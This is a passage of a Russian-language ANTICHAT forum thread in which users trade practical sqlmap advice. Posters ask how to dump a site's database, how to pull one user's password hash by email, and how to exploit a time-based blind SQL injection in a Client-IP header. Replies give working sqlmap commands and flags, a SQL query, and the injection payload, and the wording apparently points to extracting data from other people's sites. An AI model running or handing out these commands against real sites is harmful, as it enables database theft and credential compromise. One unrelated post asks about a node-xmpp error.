HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #821  
Старый 30.12.2018, 22:39
Sensoft
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
Провел на форуме:
104689

Репутация: 1
По умолчанию

И ещё

Знаю почту как чтобы всё не сливать вытащить хеш от этой почты ?
 
Ответить с цитированием

  #822  
Старый 07.01.2019, 02:06
grimnir
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
Провел на форуме:
216062

Репутация: 231


По умолчанию

Цитата:
Сообщение от Sensoft  

Как сливать базу с конца ?
--start --stop
 
Ответить с цитированием

  #823  
Старый 07.01.2019, 02:08
grimnir
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
Провел на форуме:
216062

Репутация: 231


По умолчанию

Цитата:
Сообщение от Sensoft  

И ещё
Знаю почту как чтобы всё не сливать вытащить хеш от этой почты ?
1)--sql-shell

2)SELECT * FROM table_name WHERE email="email@email.com";
 
Ответить с цитированием

  #824  
Старый 07.01.2019, 11:29
=HALK=
Новичок
Регистрация: 30.10.2008
Сообщений: 12
Провел на форуме:
24552

Репутация: 17
По умолчанию

Цитата:
Сообщение от Sensoft  

И ещё
Знаю почту как чтобы всё не сливать вытащить хеш от этой почты ?
--where="email='mail@mail'"
 
Ответить с цитированием

  #825  
Старый 13.01.2019, 19:19
vladF
Новичок
Регистрация: 05.12.2018
Сообщений: 16
Провел на форуме:
6200

Репутация: 0
По умолчанию

Доброго времени суток. Подскажите как правильно "скормить" ссылку в sqlmap.

Сканер выдал такие данные:

This vulnerability affects /blog/adaptive-learning/.

Discovered by: Scripting (Blind_Sql_Injection.script).

Attack details

HTTP Header input Client-IP was set to (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0 )from(select(sleep(0)))v)+"*/

И Header вот такой:

GET /blog/adaptive-learning/ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

Client-IP: (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0 )from(select(sleep(0)))v)+"*/

X-Requested-With: XMLHttpRequest
 
Ответить с цитированием

  #826  
Старый 13.01.2019, 19:54
Sensoft
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Сообщение от vladF  

Доброго времени суток. Подскажите как правильно "скормить" ссылку в sqlmap.
Сканер выдал такие данные:
This vulnerability affects
/blog/adaptive-learning/
.
Discovered by: Scripting (Blind_Sql_Injection.script).
Attack details
HTTP Header input
Client-IP
was set to
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0 )from(select(sleep(0)))v)+"*/
И Header вот такой:
GET /blog/adaptive-learning/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Client-IP: (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0 )from(select(sleep(0)))v)+"*/
X-Requested-With: XMLHttpRequest
Код:
-u https://site.ru/ --headers="Client-IP: *" --dbms=mysql --random-agent --level=3 --risk=3 --dbs
 
Ответить с цитированием

  #827  
Старый 21.01.2019, 18:21
nik1201
Познающий
Регистрация: 12.07.2015
Сообщений: 39
Провел на форуме:
13708

Репутация: 0
По умолчанию

Ребят помогите, как правильно соединиться с сервером?

Что должно быть в new xmpp.Router()

/////////////////////////////////////////////////////////////

var xmpp = require('node-xmpp')

let s2s =new xmpp.Router()

s2s.register('test.servers', function (stanza) {

})


////////////////////////////////////////////////////////////

Пишу Так

-------------------------------------------

var xmpp = require(
'node-xmpp')

let s2s = new xmpp.Router({

host: 'localhost',

port: 5269,

})


s2s.register('test.servers', function (stanza) {

})

-------------------------------------------

Выдает

------------------------------------------------------------------------


Unhandled rejection TypeError: xmpp.Router is not a constructor

------------------------------------------------------------------------

В чем проблема???
 
Ответить с цитированием

  #828  
Старый 22.01.2019, 01:22
Zabiyaka1
Новичок
Регистрация: 21.01.2019
Сообщений: 1
Провел на форуме:
237

Репутация: 0
По умолчанию

Всем привет. Скажите как через SQLmap напрямую подключиться к БД Oracle.Пакеты необходимые установила... Но вожу команду подключения вида:

-d oracle://***Password@IP: PORT/dbname/

Но SQlmap выдает



[INFO] testing Oracle

[INFO] confirming Oracle

[INFO] the back-end DBMS is Oracle

back-end DBMS: Oracle


Если добавит --dbms то выдает, следующее

[WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries

[INFO] fetching current database

[WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'

[WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes

[[WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes

INFO] fetching database (schema) names

[INFO] falling back to current database

[INFO] fetching current database

[CRITICAL] unable to retrieve the database names


Что не делаю не так, и возможно ли вообще подключиться в данном случае??
 
Ответить с цитированием

  #829  
Старый 23.01.2019, 14:47
karkajoi
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
Провел на форуме:
96779

Репутация: 5
По умолчанию

Цитата:
Сообщение от Zabiyaka1  

Всем привет. Скажите как через SQLmap напрямую подключиться к БД Oracle.Пакеты необходимые установила... Но вожу команду подключения вида:
-d oracle://***Password@IP: PORT/dbname/
Но SQlmap выдает


[INFO] testing Oracle

[INFO] confirming Oracle

[INFO] the back-end DBMS is Oracle

back-end DBMS: Oracle

Если добавит --dbms то выдает, следующее
[WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries

[INFO] fetching current database

[WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'

[WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes

[[WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes

INFO] fetching database (schema) names

[INFO] falling back to current database

[INFO] fetching current database

[CRITICAL] unable to retrieve the database names

Что не делаю не так, и возможно ли вообще подключиться в данном случае??
-d oraclel://test:123@127.0.0.1:3306/имябазы

[CRITICAL] unable to retrieve the database names

не может получить имя базы данных

Пробуй --no-cast или --hex

Другими словами мапа не может понять к чему ей подключатся.

То есть тебе надо узнать имя бд для начала
 
Ответить с цитированием

  #830  
Старый 26.01.2019, 02:47
Estet
Познающий
Регистрация: 30.08.2016
Сообщений: 34
Провел на форуме:
12641

Репутация: 0
По умолчанию

Доброй ночи

Несколько вопросов:

1. Выводит колонку password как none, извлекает именно слово none посимвольно, в каждой строке. Как такое может быть? Можно ли что-то сделать?

2. Бывает извлекает пасы как или еще что-нибудь подобное, hex и nocast не помогает, это какая-то защита стоит я так понимаю, только тамперы подбирать?

3. Глупый вопрос, как определить текущую базу данных. Раскручиваешь скулю, там куча баз данных, бывает допустим sitename, sitenamedb, test_sitename и прочие в куче. Как определить текущую/рабочую? думал это curent-db, но с этой командой он просто извлекает таблицы всех баз подряд.

Спасибо за помощь
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.